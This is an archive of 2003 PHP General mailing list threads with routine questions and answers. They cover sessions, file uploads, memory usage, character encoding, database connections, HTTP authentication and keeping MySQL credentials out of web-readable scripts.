Not possible, for many reasons. Not the least of which is that db servers, like any server, only have a limited number of connections. Can you imagine the havoc that multiple, session-wide, open connections would do to a db server - even under light load? Oh ya, plus it's absolutely impossible to persist any type of resource from one request to the next. Cheers, Pete. -- Peter James [EMAIL PROTECTED] php|architect The Magazine for PHP Professionals http://www.phparch.com - Original Message - From: Jackson Miller [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Tuesday, July 29, 2003 1:39 PM Subject: [PHP] DB resource as Session var I think I know the answer to this, but I have no technical reason to back it up. Is it possible to store a db connection resource id as a $_SESSION variable? It would be nice to have one connection per user/session that carries over multiple page views. I am guessing this is impossible, but if so I would like to know why. Thanks, -Jackson -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Apache logs to keep $_POST values
I wonder if something like mod_filter, that would be able to access each request before it hit PHP, would work for this. -- Peter James [EMAIL PROTECTED] php|architect The Magazine for PHP Professionals http://www.phparch.com - Original Message - From: Nicholas Robinson [EMAIL PROTECTED] To: Jay Blanchard [EMAIL PROTECTED]; Bogdan Albei [EMAIL PROTECTED]; [EMAIL PROTECTED] Sent: Tuesday, July 29, 2003 1:42 PM Subject: Re: [PHP] Apache logs to keep $_POST values Probably better to shell a command to write to the system log - I don't think PHP can do it directly. This would nott be subject to the contention problems you cite in writing to either an apache log or a dedicated log. HTH Nick On Tuesday 29 Jul 2003 8:36 pm, Jay Blanchard wrote: [snip] I wanted to know if Apache has a feature that could log the $_POST values. [/snip] I don't think so, you would probably have to consult an Apache list or the Apache manual. [snip] By the way, fopening the log file and write the $_POST variables won't work on a server with high activity because other requests could be processed by apache and logged before I can write my $_POST variables in it's access log so I would just mess up my logs. I could just keep my own log written by my application if Apache doesn't have such a feature. This helps a lot tracking bugs because people just don't remember what they've done when something went wrong. [/snip] True, I was just offering a solution to your situation. I like your idea better, but you are likely to have the same problem with a seperate log on a high traffic site, no? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] memory consumption from a script
A while ago, Philip Olson wrote: As of 4.3.2, if you compile PHP with --enable-memory-limit you may use memory_get_usage(). This is documented and will show up when the next PHP manual is built. This function is not documented in the PHP manual, but is in the zend copy: http://www.zend.com/manual/function.memory-get-usage.php HTH. Pete. -- Peter James [EMAIL PROTECTED] php|architect The Magazine for PHP Professionals http://www.phparch.com - Original Message - From: John W. Holmes [EMAIL PROTECTED] To: Torsten Rosenberger [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Sunday, July 27, 2003 7:39 AM Subject: Re: [PHP] memory consumption from a script Torsten Rosenberger wrote: is it possible to find out the memory consumption on a php script ? I trie to develop a chat with php and SHM and want to fiend out how much memory is used to scale the chat server No, not now. I seem to remember talk about a function that would help with this being available in PHP5, but I can't find anything in the documentation. -- ---John Holmes... Amazon Wishlist: www.amazon.com/o/registry/3BEXC84AB3A5E/ PHP|Architect: A magazine for PHP Professionals www.phparch.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] small request
Yes. . -- Peter James [EMAIL PROTECTED] php|architect The Magazine for PHP Professionals http://www.phparch.com - Original Message - From: Ryan A [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Sunday, July 27, 2003 8:34 AM Subject: [PHP] small request Hi, I want to find out if this is my browsers fault or the settings in my php.ini, can you goto http://bestwebhosters.com/my.login.php then look at the page source and tell me if there is a hidden variable after the form tag with the name PHPSESSID Thanks for helping. Cheers, -Ryan -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Please HELP me
You're not giving us much to work with here. What's the actual problem?
Regardless, I can see a couple of thing wrong here.
1. You're trying to do a multipart/form-data transfer using GET. You need
to use POST.
2. Unless you've got register_globals on, and even if you do, you should be
referencing your uploaded file with $_FILES['util']['tmp_name']
3. You should read the manual here:http://ca2.php.net/features.file-upload
HTH.
Pete.
--
Peter James
[EMAIL PROTECTED]
php|architect
The Magazine for PHP Professionals
http://www.phparch.com
- Original Message -
From: Rausch Alexandru [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Saturday, July 26, 2003 8:50 PM
Subject: [PHP] Please HELP me
I have some problem with uploading a file from my harddisk using a ftp
connection.
Here are the 2 files:
test.php contains the form:
table
form method=get action=test2.php enctype=multipart/form-data
tr class=cen
tdTitlu gif/td
tdnbsp;::nbsp;/td
tdinput type=file name=util class=form1brinput type=submit
value=expediaza/td
/tr
/form
/table
and test2.php is the script for upload :
?
$ftp_server=*;
$con = ftp_connect($ftp_server);
// login with username and password
$login_result = ftp_login($con, *, ***);
if ((!$con) || (!$login_result)) {
echo FTP connection has failed!;
echo Attempted to connect to $ftp_server;
$error=1;
} else {
echo Connected to $ftp_server br;
}
$util=strtolower($util);
$destination=tit.gif;
if(ftp_put($con, $destination, $util, FTP_BINARY)){echo OK ,am pus titlul
br;}
else{ echo eroarebr;$error=1;}
?
Thanks in advanced
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] memory consumption from a script
I think it's pretty standard. It just means that you can control how much memory your script uses. -- Peter James [EMAIL PROTECTED] php|architect The Magazine for PHP Professionals http://www.phparch.com - Original Message - From: John W. Holmes [EMAIL PROTECTED] To: Peter James [EMAIL PROTECTED] Cc: Torsten Rosenberger [EMAIL PROTECTED]; [EMAIL PROTECTED] Sent: Sunday, July 27, 2003 10:50 AM Subject: Re: [PHP] memory consumption from a script Peter James wrote: A while ago, Philip Olson wrote: As of 4.3.2, if you compile PHP with --enable-memory-limit you may use memory_get_usage(). This is documented and will show up when the next PHP manual is built. This function is not documented in the PHP manual, but is in the zend copy: http://www.zend.com/manual/function.memory-get-usage.php Ah, that's the one I was looking for. Are there any downsides to compiling PHP with --enable-memory-limit or is that something that's normally done? -- ---John Holmes... Amazon Wishlist: www.amazon.com/o/registry/3BEXC84AB3A5E/ PHP|Architect: A magazine for PHP Professionals www.phparch.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Parsing PHP
There is the tokenizer extension... http://www.php.net/tokenizer This might give you a good start. -- Peter James [EMAIL PROTECTED] php|architect The Magazine for PHP Professionals http://www.phparch.com - Original Message - From: Nikhil G. Daddikar [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Saturday, July 26, 2003 1:06 AM Subject: [PHP] Parsing PHP I am using PHP to develop and web app. The app also has a scripting language for the *end user*. I was thinking if I could expose a very simple subset of PHP to them (foreach, if-then-else, variable assignments and comments) and then simply eval it. But I don't want them to use calls like system or do infinite loops etc. that will screw up the system. I was thinking if I had a PHPparser that returns tokens, then I can eliminate the call to unwanted funtions, etc. Any ideas on how I should proceed? Thanks. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] REVISED: PHP timeout doing fread from Apache Coyote
Robert Fitzpatrick wrote: Sorry, the correct request and response is below, the one I copied before was from the browser: Request: Request:brPOST /XMLCommunicationServlet HTTP/1.0 Content-Type: application/x-www-form-urlencoded User-Agent: PHP XMLRPC Host: api.newedgenetworks.com:80 Connection: keep-alive Try not having the connection kept alive. (just a thought) -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: Hi All
Shishir Kumar Mishra wrote: Hi All, I am reading one XML which has some german characters. I am sending this data to PHP script but when try to echo ;it prints some other character. eg. XML has für but output is coming like für ; My script is like following: ?php $loc = UTF-8; putenv(LANG=$loc); setlocale (LC_ALL, 'de_DE'); echo br.$producttext[2]; ? in XML file : producttext has value like für ; regards.. Shishir Kumar Mishra Agni Software (P) Ltd. www.agnisoft.com What are you outputting to? Is it able to display UTF-8? Does it know that the string is UTF-8? an html page would tell a browser with: meta http-equiv=Content-Type content=text/html; charset=UTF-8 Peter -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: Error - when trying to connect to postgresql
When I try to connect to postresql with my php script below I got hhis eror: I can insert into the table from psql. Please help Thanks, --- Warning: pg_exec() query failed: ERROR: invention: permission denied in /home/pptun/public_html/invention.php on line 9 --- $conn = pg_connect(dbname=pptun port=5432); My first guess is that your problem comes from the fact that pg_connect is missing at least a username and password. From http://us4.php.net/pg_connect : $dbconn3 = pg_connect (host=sheep port=5432 dbname=mary user=lamb password=foo); //connect to a database named mary on the host sheep with a username and password Good luck peter -- Peter Torraca [EMAIL PROTECTED] -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Mail From option in PHP.ini
On 07/18/2003 12:00 PM, Brian S. Drexler wrote: Ok, I want to specify who the mail is coming from by using the sendmail_path option in the PHP.ini. I've added the [EMAIL PROTECTED] to it, but I want to be able to dynmaically change [EMAIL PROTECTED] to [EMAIL PROTECTED] or whatever else. Anyone have any ideas how I can do this? I'm pulling the e-mail I'd like to change it to from a MySQL database but can I rewrite the php.ini file on the fly or am I stuck. Any help is greatly appreciated. Why not just add the From: header to the fourth mail() param? Something like this: $email = [EMAIL PROTECTED]; $admin_email = [EMAIL PROTECTED]; $body = blah blah blah; $mail = mail($email, Information you requested, $body, From: $admin_email); I've found that this sets the headers the way most clients expect to see them. We use it a lot to tidy up emails set from reset your password functions and the like. It should be trivial to set the From: header based on a db result or whatever. There is a much expanded version of this solution regarding sending emails with attachments through mail() on in the online php manual, check out kieran dot huggins at rogers dot com's comments and some others on the http://us4.php.net/mail page (it's a 06-Nov-2002 comment). I'm coming in a bit late to this conversation -- hopefully I'm not too far off base with this reply. If I am, sorry! peter -- Peter Torraca Webmaster, Math Department Purdue Univ., Math 813 765-494-9998 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: Need Help: Please click on Test Link
Suhas Pharkute wrote: http://sspsoft.com/test/ip2ll.php (in case if you cannot get it, please click on http://ns1.webhostdns.us and then click on the website link.) which should identify your Country, State, City. Please click on one of the buttons to provide feedback. I'm in London, England and got the following result: United Kingdom, England, Southend-on-Sea So providing feedback with your options is a little tricky. England is a country not a state. It'll cause confusion if you regard it as such. Southend-on-Sea is not where I'm located. Close but no cigar :) Peter -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: scoring/sorting db search results based on score
Dave wrote: looking for code snippets or links to examples of the following; - Have a database with multiple fields that will be searched against (happens to be PostgreSQL in this instance, but we can migrate any MySQL based examples/code) - We wish to score search results - ie: a match in keywords is worth 5 points, title worth 3, and description worth 1, perhaps even so far as multiple matches producing multiples of the point value(though that can be a later consideration) - Once we get the results, we would want to display in the order of the scoring, most points first etc... Obviously there are convoluted ways to accomplish, but I am looking to maximize the database performance, limit the number of recursive searches, and use the database/PHP each handle their portion of the search/score/ranking based on their strengths and use of system resources. appreciate any feedback Dave There is a module for Postgres that does indexed full text searching, with ranking: http://www.sai.msu.su/~megera/oddmuse/index.cgi/Tsearch_V2_Readme -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] HTTP Authentication does not work
I have tried using HTTP Authentication as described in the documentation. But it does not matter how many times i type in login/password, the popup keeps coming back. The server, mandrake 9.1, uses safe mode, so PHP_AUTH_USER and PHP_AUTH_PW does not work. $_SERVER['REMOTE_USER'] does not work either. Does anyone have any ideas? Peter Holmberg -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] web site security: how to hide login info for mysql-connection
I played around with this, but couldn't get this to work in my httpd.conf: php_value disable_functions phpinfo Not sure why. I did discover, however, that the username and password will no show up in phpinfo UNLESS phpinfo() is called from within the directory, in our example that would be /var/www/html/mydatabase. That would mean that in order for someone to get the user/pass, they would have to write a php script into my directory. Any more thoughts? This seems very appealing to me. Thanks, Peter Janett New Media One Web Services, LLC http://www.newmediaone.net [EMAIL PROTECTED] (303)828-9882 -Original Message- From: Derick Rethans [mailto:[EMAIL PROTECTED] Sent: Monday, June 30, 2003 2:59 PM To: Wendell Brown Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: RE: [PHP] web site security: how to hide login info for mysql-connection On Mon, 30 Jun 2003, Wendell Brown wrote: On Mon, 30 Jun 2003 13:50:21 -0600, Peter Janett wrote: Directory /var/www/html/mydatabase php_value mysql.default_user fred php_value mysql.default_password secret php_value mysql.default_host server.example.com /Directory H what about phpinfo()? It shows those settings in the clear. php_value disable_functions phpinfo Derick -- Interpreting what the GPL actually means is a job best left to those that read the future by examining animal entrails. - Derick Rethans http://derickrethans.nl/ International PHP Magazine http://php-mag.net/ - -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] web site security: how to hide login info for mysql-connection
This issue seems to be a huge issue, and I've been looking for a good solution for quite a long time. My concern is that a shell emulating PHP or Perl script run as Apache can read or copy ANY PHP script used with PHP as an Apache module. I setup Apache SuExe on my server, and use it with Perl, and optionally PHP. I don't want to make CGI based PHP the default, because running PHP as a CGI slows it down a bit, but more importantly, limits a few functions. I was reading the PHP site, and found an interesting idea at http://us3.php.net/manual/en/function.mysql-connect.php in the user notes. - Another solution to the security problems of putting usernames and passwords into scripts. I haven't found this documented anywhere else so thought I'd suggest it for the online documentation. Don't put passwords for mysql into scripts which may be read by any user on the machine. Instead put them into an Apache configuration file and make sure that it is not world-readable. (Apache reads its main config files as root.) For example, add this to your httpd.conf (and chmod it to 600 or 660) then tell your apache to reload itself (apachectl graceful). Directory /var/www/html/mydatabase php_value mysql.default_user fred php_value mysql.default_password secret php_value mysql.default_host server.example.com /Directory Then all you need in your PHP code is $handle = mysql_connect() or die(mysql_error()); The passwords etc will only be picked up by scripts running in the named directory (or a sub-directory). The same may be done for virtualhosts etc. If you don't want to keep reloading your Apache server then you ay test things putting the php_value directives into a (world readable) .htaccess file. (Clearly not for production use.) If you need to debug the values that are being supplied (or not) then use this snippet: @syslog(LOG_DEBUG, Using user=.ini_get(mysql.default_user). pass=.ini_get(mysql.default_password). host=.ini_get(mysql.default_host)); (This assumes that you are not running in 'safe_mode' and that you are on a unix of some sort.) I can't think of why this wouldn't work, and it seems much more secure than just putting the PHP script with the passwords outside the web root. Has anyone done this? Any thoughts on how someone could still get the passwords with this setup? Thanks, Peter Janett New Media One Web Services, LLC http://www.newmediaone.net [EMAIL PROTECTED] (303)828-9882 -Original Message- From: Mark [mailto:[EMAIL PROTECTED] Sent: Monday, June 30, 2003 8:34 AM To: Jaap van Ganswijk; [EMAIL PROTECTED] Subject: Re: [PHP] web site security: how to hide login info for mysql-connection How do you handle storing the login info then? Do you encrypt the file and decrypt it on the fly? Where would you store the key? I'm in the process of setting up a new application, and I've always used the login info outside the webroot method but if there's something more I can do, I'd like to know... --- Jaap van Ganswijk [EMAIL PROTECTED] wrote: At 2003-06-29 17:21 +0100, Avvio - Frank wrote: basically you need to append to your include_path and you can probably create a local .htaccess file and set an include path in there (look up php_value syntax for .htaccess) otherwise start your script with a customised version of the following: ini_set(include_path,ini_get(include_path).:. /your/path/here/); then include/require as normal I think you can also use an include statement like this: include ../../php/include/file.inc; The same mechanism can also be used for data files that also shouldn't be in the WWW accessible directory tree, I think. (But I'm not an expert.) I always try to write my programs very portable and I have found that using ../application_data/file.txt isn't a problem, but using ../../xxx/application_data/file.txt is usually a problem, because you don't want to hardcode the name of the directory above the current directory (in this case 'xxx'). Sometimes however you have to go two levels up to go out of the WWW-acessable directory three. By the way, I think it's unwise to keep the MySQL login data uncoded on the Unix system, because other users or the system managers could read it. Generally these files have to be readable by Apache and therefore other users on the system can often also read them. Greetings, Jaap - Original Message - From: anders thoresson [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Sunday, June 29, 2003 4:33 PM Subject: Re: [PHP] web site security: how to hide login info for mysql-connection Be aware that wherever you store the settings folder, your php.ini should have that path in it's include_directories setting, and the webserver must have read permissions for that file. I don't have access to php.ini on my ISP's web server
[PHP] Reverse Phone Number Lookup in importable format
I'm looking to do a lookup on a list of my incoming phone numbers. (Basically adding name to a number only caller ID setup.) I've found a couple sites that allow reverse phone number lookups, most notably anywho.com, by I'm hoping to find something that would allow me to easily get the data retuned from a lookup into my PHP application. (XML would seem the best option, but I'd settle for anything.) I'm hoping I don't have to try to write a clumsy web scraper type thing using to process this. It's a prototype, so the legalities of mass use can come later. In other words, a non free option would be viable long term, and I'm hoping to avoid a legal discussion about scraping this kind of data, privacy, etc. Any ideas, resources, etc would be most appreciated. Thanks, Peter Janett New Media One Web Services, LLC http://www.newmediaone.net webmaster at newmediaone.net (303)828-9882 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] interact with .htaccess
I want to send user and password from php to a protected directory. For example: If I go directly to the directory I get a popup to enter user and password, the normallt way. But if I go through a php-script that checks if I'm a valid user from a database I will get access to the folder. So i need a way to send user/password from php to the .htaccess file. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: interact with .htaccess
what I mean is if you can create a form page in PHP prompting for a username and password and then redirect into an .htaccess protected directory without having the server pop up another username/password box? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: interact with .htaccess
ok, I change my question, how do I protect downloadable files from users that are not valid? without the use of htaccess? Peter Berglund [EMAIL PROTECTED] skrev i meddelandet news:[EMAIL PROTECTED] I want to send user and password from php to a protected directory. For example: If I go directly to the directory I get a popup to enter user and password, the normallt way. But if I go through a php-script that checks if I'm a valid user from a database I will get access to the folder. So i need a way to send user/password from php to the .htaccess file. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] how to count memory used by a script
How do I count the memory usage of a script/page. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] selecting count and then dumping to an array
Try select type, count(*) from table group by type; This should return a count for each distinct type value. Regards Peter Goggin - Original Message - From: Ryan A [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Sunday, June 08, 2003 12:13 AM Subject: [PHP] selecting count and then dumping to an array Hi, Is there any way to get a COUNT of records (SELECT count(*) FROM main_my where type=$t) for 5 types using hopefully one select statement and then dumping that into an array? The reason I am asking is running 5 selects on the DB at once is not a very good idea...right? Thanks, -Ryan http://MrSahaf.com - The Iraqi (Dis)information ministers site (We will slaughter you all!) -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: php4isapi.dll and header(Location: ...)
Eric Tonicello wrote: Hi ! Have somebody successed with the function header(Location: http://...;) using the php4isapi.dll ??? My code works well with PHP using the CGI php.exe, but impossible to make it work with the ISAPI module !!! Configuration: -Windows 2000 server - PHP 4.3.2 php.ini : - output_buffering = on Have you tried: ob_end_clean(); header(Location: http://...;); to throw away the contents of the output buffer before sending the Location header, then its nice and clean. Peter - zlib.output_compression = on Any idea ?? Other bugs with ISAPI module ??? Thanks for help ! Eric Tonicello -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] $mc=new myclass(); or $mc= new myclass(); ?
need knowledge help - what do you suggest to use: $mc = new myclass(); or $mc = new myclass(); because in any tutorial I can see the first form, but on page what references do in PHP manual I found out the second form so? 5o -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
